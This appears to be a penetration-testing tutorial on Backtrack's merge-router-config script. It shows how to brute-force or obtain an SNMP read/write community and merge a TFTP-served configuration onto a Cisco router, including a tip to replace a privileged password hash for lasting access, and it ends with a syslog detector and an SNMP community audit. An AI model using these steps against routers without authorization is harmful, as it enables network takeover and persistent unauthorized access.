The merge-router-config menu item in Backtrack Linux, located in the Backtrack menu under Backtrack > Vulnerability Assessment > Network Assessment > Cisco Tools, allows you to make changes to a Cisco router configuration file and merge those changes onto a Cisco router. You should be extremely careful with this script, as it makes changes to the target Cisco router. Below we describe the tool in more detail and show an example of merging a router configuration file onto a Cisco 861 router.
Information Needed To Successfully Merge Cisco Router Configuration:
First you will need an RW (read/write) community string for the target Cisco router, a running TFTP server, and a Cisco router configuration file that you can modify. Once you have obtained the RW community string for the Cisco router, either by brute force using a Backtrack tool (ADMsnmp or onesixtyone) or by other means, you can set up a TFTP server and retrieve the current Cisco router configuration using the information in this article about the copy-router-config tool in Backtrack Linux.
Merge Cisco Router Configuration:
Once you have modified the Cisco router configuration file, which could be as simple as changing the motd (Message of the Day) banner to let the client know about the potential vulnerability, or as invasive as modifying routing information or enabling/disabling interfaces, you are ready to rock. Place the modified router configuration file in the /srv/tftp directory on Backtrack (make sure it is named pwnd-router.config) and use the example below to construct a command that uses the merge-router-config Perl script to write the changes to the target Cisco router. If you are going to work with a lot of Cisco routers you might want to edit the script and change the $merge_f variable to $ARGV[3], which would add a fourth command line argument: the name of the Cisco router configuration file to merge into the target Cisco router.
merge-router-config Perl Script On Backtrack Linux:
root@bt:/pentest/cisco/copy-router-config# perl merge-router-config.pl 192.168.1.22 192.168.1.88 private
192.168.1.88:pwnd-router.config -> 192.168.1.22:running-config... OK
root@bt:/pentest/cisco/copy-router-config
The above command took about 10 seconds to complete, though this will vary with the size of the Cisco router configuration file. That is really it: you have now updated the target router with whatever changes you wanted to make. You could, for instance, change the password hash of an account on the Cisco router with level 15 privileges; while the read/write SNMP community string already provides much the same access, you would then have direct, full access to the router moving forward. Note, though, that writing changes to the Cisco router produces console messages like the two shown in the example below, which were displayed on the console of the target Cisco router; depending on how the router is monitored, these can trigger an alert.
Console Messages On Cisco Router When Merging Changes Via merge-router-config:
Dec 26 15:45:19.823: % Multiple self signed certificates in config
certificate for trust point TP-self-signed-2351550040 ignored
Dec 26 15:45:20.039: %SYS-5-CONFIG_I: Configured from tftp://192.168.1.88/pwnd-router.config by console
Now you can say you pwned a Cisco router. :) This should give you enough ammo to convince the owner of the Cisco router that, if SNMP has to be enabled on the device, access to it should be limited to specific IP addresses. Thanks again to Muts for a great Perl script.
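Two things a router owner can take away from the console messages above and the closing recommendation: the %SYS-5-CONFIG_I line names the TFTP source of a merged configuration, so it is easy to alert on, and an RW community with no access list is easy to spot in a running-config. The script below is an added example written for this page, not part of Backtrack or Muts's merge-router-config tool. It parses syslog-style lines modelled on the two messages shown (the extra noise lines, the hostname edge-861, the management address 192.168.1.5 and the ops-rw community are constructed), flags any configuration load that came from a network file server URL, and audits a constructed config excerpt for RW communities that are not bound to an access list, printing the IOS lines that restrict them to one management host.

```python
import re
from dataclasses import dataclass

# Constructed console/syslog sample: the two messages from the page plus
# ordinary noise and a legitimate operator change (hypothetical host/times).
SAMPLE_LOG = """\
Dec 26 15:44:02.100: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0, changed state to up
Dec 26 15:45:19.823: % Multiple self signed certificates in config
certificate for trust point TP-self-signed-2351550040 ignored
Dec 26 15:45:20.039: %SYS-5-CONFIG_I: Configured from tftp://192.168.1.88/pwnd-router.config by console
Dec 26 16:02:11.500: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.0.0.5)
"""

# %SYS-5-CONFIG_I: the "Configured from" source is either a file URL
# (tftp://host/file, i.e. a config copied in over SNMP/TFTP) or "console".
CONFIG_I_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:.]+): %SYS-5-CONFIG_I: Configured from "
    r"(?P<source>\S+)(?: by (?P<by>.*))?$"
)


@dataclass(frozen=True)
class ConfigLoadEvent:
    timestamp: str
    source: str         # "console" or a URL such as tftp://host/file
    by: str             # the "by ..." tail as logged, or ""
    from_network: bool  # True when the config arrived from a file server URL


def parse_config_events(log_text: str) -> list[ConfigLoadEvent]:
    """Extract every CONFIG_I event from a block of syslog lines."""
    events = []
    for line in log_text.splitlines():
        m = CONFIG_I_RE.match(line.strip())
        if not m:
            continue
        source = m.group("source")
        events.append(ConfigLoadEvent(
            timestamp=m.group("ts"),
            source=source,
            by=m.group("by") or "",
            from_network="://" in source,
        ))
    return events


def network_config_loads(log_text: str) -> list[ConfigLoadEvent]:
    """Events worth alerting on: a configuration merged from a remote file server."""
    return [e for e in parse_config_events(log_text) if e.from_network]


# Constructed running-config excerpt: one unrestricted RW community (the page's
# "private"), one RW community bound to a standard ACL, and one RO community.
SAMPLE_CONFIG = """\
hostname edge-861
!
access-list 10 permit host 192.168.1.5
!
snmp-server community private RW
snmp-server community public RO
snmp-server community ops-rw RW 10
snmp-server location lab
"""

# IOS syntax: snmp-server community <string> [view <name>] [RO|RW] [ipv6 <nacl>] [<acl>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (?P<name>\S+)"
    r"(?: view \S+)?(?: (?P<mode>RO|RW))?(?: ipv6 \S+)?(?: (?P<acl>\S+))?$"
)


def unrestricted_rw_communities(config_text: str) -> list[str]:
    """Names of RW communities that no access list restricts."""
    findings = []
    for line in config_text.splitlines():
        m = COMMUNITY_RE.match(line.strip())
        if m and m.group("mode") == "RW" and not m.group("acl"):
            findings.append(m.group("name"))
    return findings


def hardened_community_lines(name: str, acl: str, mgmt_ip: str) -> list[str]:
    """IOS lines binding the community to a standard ACL that permits only the
    management host, which is the page's recommended mitigation."""
    return [
        f"access-list {acl} permit host {mgmt_ip}",
        f"snmp-server community {name} RW {acl}",
    ]


if __name__ == "__main__":
    for e in network_config_loads(SAMPLE_LOG):
        print(f"ALERT {e.timestamp}: config loaded from {e.source} (by {e.by})")
    for name in unrestricted_rw_communities(SAMPLE_CONFIG):
        print(f"FINDING: RW community {name!r} has no access list; suggested fix:")
        for line in hardened_community_lines(name, "10", "192.168.1.5"):
            print("  " + line)
```

Run against the constructed sample, the detector reports only the TFTP load and not the operator's console change, and the audit flags only private. Real IOS logging lines may carry a leading sequence number or asterisk, so adapt the timestamp pattern to your syslog format before using this on collected logs.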